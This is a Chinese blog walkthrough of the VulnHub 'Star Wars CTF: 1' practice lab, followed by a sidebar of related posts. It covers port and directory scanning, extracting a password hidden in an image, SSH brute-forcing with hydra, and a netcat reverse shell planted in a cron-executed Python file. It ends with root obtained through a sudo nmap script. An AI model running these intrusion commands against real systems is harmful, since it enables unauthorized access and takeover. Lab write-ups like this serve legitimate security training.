VulnHub渗透测试实战靶场 - STAR WARS CTF: 1

最新推荐文章于 2023-01-18 10:40:34 发布
最新推荐文章于 2023-01-18 10:40:34 发布
阅读量474 收藏 1
点赞数
分类专栏: # VulnHub 文章标签: VulnHub 渗透测试 linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LYJ20010728/article/details/119922062
版权

VulnHub渗透测试实战靶场 - STAR WARS CTF: 1

题目描述

Star Wars themed CTF for beginners

This works better with VirtualBox rather than VMware

环境下载

NULLY CYBERSECURITY: 1靶机搭建

  1. 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式
  2. 将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only
  • 目标靶机的 IP 地址为:192.168.56.111
  • 攻击机的 IP 地址为:192.168.56.102

渗透测试

信息搜集

用 Nmap 扫描一下目标靶机的端口信息:sudo nmap -sS -A -Pn 192.168.56.111,发现开放了 22、80 两个端口

用 dirb 扫描一下 80 端口 web 目录:dirb http://192.168.56.111

漏洞挖掘

  • 访问 http://192.168.56.111/robots.txt,提示
Why does the Jedi Order keep checking the robots.txt file.
Might take a look at /r2d2
He is the real OG.
  • 根据提示访问 http://192.168.56.111/r2d2
  • 查看 http://192.168.56.111/index.html 源代码,发现注释中有串 base64 字符串注明是密码,解密后出现了滑稽的一幕,先记录一下等会试试有没有用
  • 注意到前面的页面中存在两张照片,访问 http://192.168.56.111/images/,正好是这两张照片,下载下来分析时发现 png 图片有异常的数据,用 zsteg 查看一下发现真正的密码:babyYoda123
  • 但是不知道用户名是啥,继续用 dirb 探测一下 dirb http://192.268.56.111 -X .php,.js,.txt,发现存在 http://192.168.56.111/users.js,访问得到两个用户名 skywalker、han

getshell

  • 由于开放了 22 端口,用得到的用户名和密码组合尝试登录 ssh,发现 skywalker:han 可以组合成功

提权

  • 查看文件发现 han 家目录下有一个文件夹 .secrets,内有一个 note.txt,查看内容
  • 根据 note.txt 的内容,利用 cewlhttp://192.168.56.111/r2d2 进行信息收集制作密码集
cewl http://192.168.56.111/r2d2 > pass.txt
  • 继续用 hydra 爆破 skywalker 的密码,得到密码: tatooine
hydra -l skywalker -P pass.txt -f -V 192.168.56.111 ssh
  • 切换用户到 skywalker,继续重复前面的操作,发现内容
  • 查看用户 Darth 家目录下的内容,同样发现家目录下有一个文件夹 .secrets,内有一个 eval.py,其是一个可读写的可执行 python 文件,这个文件在一分钟后执行,我们修改其内容为
import os 
os.system("nc -e /bin/bash 192.168.56.102 1234")
  • 起个 nc,等待片刻,成功接收到反弹的 shell,先将 shell 转变成交互式的 shell
SHELL=/bin/bash script -q /dev/null
  • 执行 sudo -l 查看,发现可以通过 /usr/bin/nmap 来提权,成功拿到 root 权限
echo "os.execute('/bin/sh')" > /tmp/root.nse
sudo /usr/bin/nmap --script=/tmp/root.nse
H3rmesk1t
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
star-wars-wiki::eight-pointed_star: 包含星球大战宇宙信息的维基百科
05-29
:eight-pointed_star: 星球大战宇宙的完整维基百科 :eight-pointed_star: :rocket: 关于该项目 是一个 Web 应用程序,其中包含由提供的有关 Star Wars 特许经营领域的大量信息。 了解有关星球大战宇宙电影、角色、行星和宇宙飞船的更多信息。 :nerd_face: :gear: 怎么跑 要在您的机器上运行和测试应用程序,首先在您的计算机上克隆存储库。 在您的机器上克隆并拥有所有文件后,进入存储库的根文件夹“./”并在其上打开您的终端。 在终端中,输入以下命令来安装所有依赖项: $ npm install 安装所有依赖项后,现在只需运行以下命令: $ npm start 就是这样,现在您可以使用整个应用程序。 :beaming_face_with_smiling_eyes: :technologist_medium_skin_tone: 技术 以下是用于开发此应用程序的主要技术的列表。 记住一切都是使用语言开发的。 :atom_symbol: 构架 :books: 库和依赖项 公理 套件 日期结束 :la
vulhub-Star Wars CTF:1
最新发布
2201_75378806的博客
05-13 258
经过探索,我们发现该目录包含一个名为“note.txt”的文本文件。有一个可读写的可执行python文件,并且该文件在一分钟后正在执行。爆破目录,在/imagess目录下正好是这两张照片,对目录详细爆破以下,加-X .php,.js,.txt试试。nmap的--script执行脚本,我们直接创建一个反弹shell脚本给它执行就可以得到root权限。现在我们得到了账号和密码,这边账号密码少可以一个个尝试,这边使用hydra。切换到主目录后,我们发现一个名为 Darth 的文件夹,其中包含一个名为。
vulnhub STAR WARS CTF: 1 记录
qq_45826388的博客
09-22 408
Description Star Wars themed CTF for beginners kali:192.168.157.128 靶机:192.168.34.153 端口扫描nmap -A -p- 192.168.34.153 目录爆破:dirb http://192.168.34.153. 提示说 你需要找到密码 查看源码发现一串base64 解码发现没有用 查看wordpress 查看admin 发现robots.txt有提示 看不懂 查看主页的图片,是图片隐写 利用工具setgs
靶机渗透练习99-hacksudo:FOG
hirak0的博客
05-12 4655
靶机描述 靶机地址:https://www.vulnhub.com/entry/hacksudo-fog,697/ Description This box should be easy . This machine was created for the InfoSec Prep Discord Server (https://discord.gg/7ujQrt393b) The box was created with Virtualbox. Upon booting up use netdiscov
VulnHub渗透测试实战靶场 - NULLY CYBERSECURITY: 1
LYJ20010728的博客
08-25 605
VulnHub渗透测试实战靶场 - NULLY CYBERSECURITY: 1题目描述环境下载NULLY CYBERSECURITY: 1靶机搭建渗透测试信息搜集漏洞挖掘getshwll提权 题目描述 Nully Cybersecurity - this is an easy-intermediate realistic machine. While working with the machine, you will need to brute force, pivoting (using metasp
VulnHub靶场】——HARRYPOTTER第三部: FAWKES
Demo不是emo的博客
10-14 5095
这是哈利波特vm系列靶场的第三个靶场,总共有三个靶场,其中隐藏了8个魂器,前两部的靶场中我们已经找到了隐藏的5个魂器,今天这个靶场中隐藏了三个,意思就是今天的靶场有三个flag,话不多说我们来仔细瞧瞧
reactjs-starwars::star:ReactJS中的应用程序调用API并保存在Redux中,并使用其他Web技术
05-12
注意:如果用户位于葡萄牙语位置,则可以更改“ index.js”文件中的代码行以测试英语,该文件还包含此更改的文档。 指数 信息 关于 组件 标头 踢脚线 轮廓 清单 发展 环境设定 项目安装 项目执行 在项目中使用 图书...
quiz-star-wars::books:关于《星球大战》系列历史上某些要点的互动式测验
05-21
测验-星球大战 :construction: CJRM-Roger Melo JavaScript课程 :rocket: :construction:正在施工:construction:... :construction: :spiral_notepad: 关于 基于《星球大战》电影专营权历史中的点的互动式测验 ...
kei-star-wars:https
04-15
在交互式监视模式下启动测试运行器。 有关更多信息,请参见关于的部分。 npm run build 构建生产到应用程序build文件夹。 它在生产模式下正确捆绑了React,并优化了构建以获得最佳性能。 最小化内部版本,文件名...
es6-star-wars:使用 ES6 的 SWAPI React 实现
06-01
在本项目"es6-star-wars"中,开发者利用了ES6的新特性,结合React框架,构建了一个基于SWAPI(Star Wars API)的应用。通过这个项目,我们可以深入了解ES6在现代前端开发中的应用,以及如何将这些新特性与React组件...
vulnhub之HARRYPOTTER: FAWKES
weixin_54431413的博客
05-26 1393
对发现的程序用edb-debugger进行调试,发现缓冲区溢出漏洞,找偏移量确定位置,注入payload,打点成功,信息收集,发现账号密码,通过ssh登录,tcpdump分析流量,成功跳出容器。最后利用堆缓冲区溢出提权成功。
Fawkes(vulnhub)
wcl20010的博客
05-29 1131
HarryPotter: Fawkes ~ VulnHub 此靶机难度高 目录 1.主机发现 2. 端口扫描 3.漏洞发现 Ftp 4.缓冲区溢出 使用edb调试server_hogwarts 攻击思路: 确定溢出位置: 5.反弹shell 构造exp 拿下靶机shell 升级shell 6.提权(信息收集) 信息收集 流量分析 提权 漏洞检测 漏洞利用 找网上的exp测试 ​编辑 执行 1.主机发现 arp-scan -l 2. 端口扫描
渗透测试】第七周 vulnhub-Fawkes
铃的杂货铺分铺
11-08 1080
渗透测试学习第七周,vulnhub靶场Fawkes靶机。 主机发现、端口扫描;FTP匿名登录;edb 调试程序;栈溢出攻击;tcpdump 流量分析;sudo 漏洞提权。
vulnhub:Nully Cybersecurity靶机
qq_43884092的博客
01-18 115
访问80端口,提示pop3账号密码,使用telnet访问pop3,密码列表可以由rockyou.txt生成
VulnHub渗透实战--Billu_b0x
crispr的博客
02-05 980
Billu_b0x 0X01 Main Point 1.简单的代码审计 2. 文件包含漏洞(LFI) 读取源码 3. 文件上传得到webshell 4. Linux内核提权(Ubuntu 12.04) 5. SQLI 0X02 前期嗅探和端口探测 arp-scan -l #得到靶机IP nmap -sV -A -p- 172.20.10.3 #探测靶机端口及系统情况 常规的开放...
Vulnhub通关手册》—— 04 Five86-1
weixin_53801131的博客
12-30 600
Vulnhub通关手册——04 Five86-1 背景概述: 下载地址为:https://www.vulnhub.com/entry/dc-1-1,292/ 本次靶机IP为100.10.10.133,将该IP地址添加到hosts文件中,映射到域名five86.local 技术要点: opennetadmin漏洞利用 find / -type f -user 用户名查看该用户名可以读取的文件 使用hash-identifier查看加密方式 使用crunch生成字典 使用hashcat工具进行密码破解
CTF WriteUp】2021 starCTF部分Crypto题解
cccchhhh6819的博客
01-18 4426
(打比赛感想:大佬真TM多。。。) Crypto Crypto-GuessKey 题目 from random import randint import os from flag import flag N=64 key=randint(0,2**N) print key key=bin(key)[2:].rjust(N,'0') count=0 while True: p=0 q=0 new_key='' zeros=[0] for j in range(len(key)): if key
VulnHub渗透测试实战靶场 - Tomato:1
LYJ20010728的博客
08-19 1897
VulnHub渗透测试实战靶场 - Tomato:1环境下载Tomato:1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 Tomato:1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.137 使用 nmap 扫描开放的端口:sudo nmap -sC -sV -p 1-100
Vulnhub靶场篇:VulnHub2018_DeRPnStiNK
夜车星繁的博客
05-13 1249
靶场难度:中下难度 VMWARE虚拟机下搭建环境: 攻击机kali IP:192.168.223.136 攻击机win10:本机 靶 机IP:192.168.223.141 首先进行信息收集:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值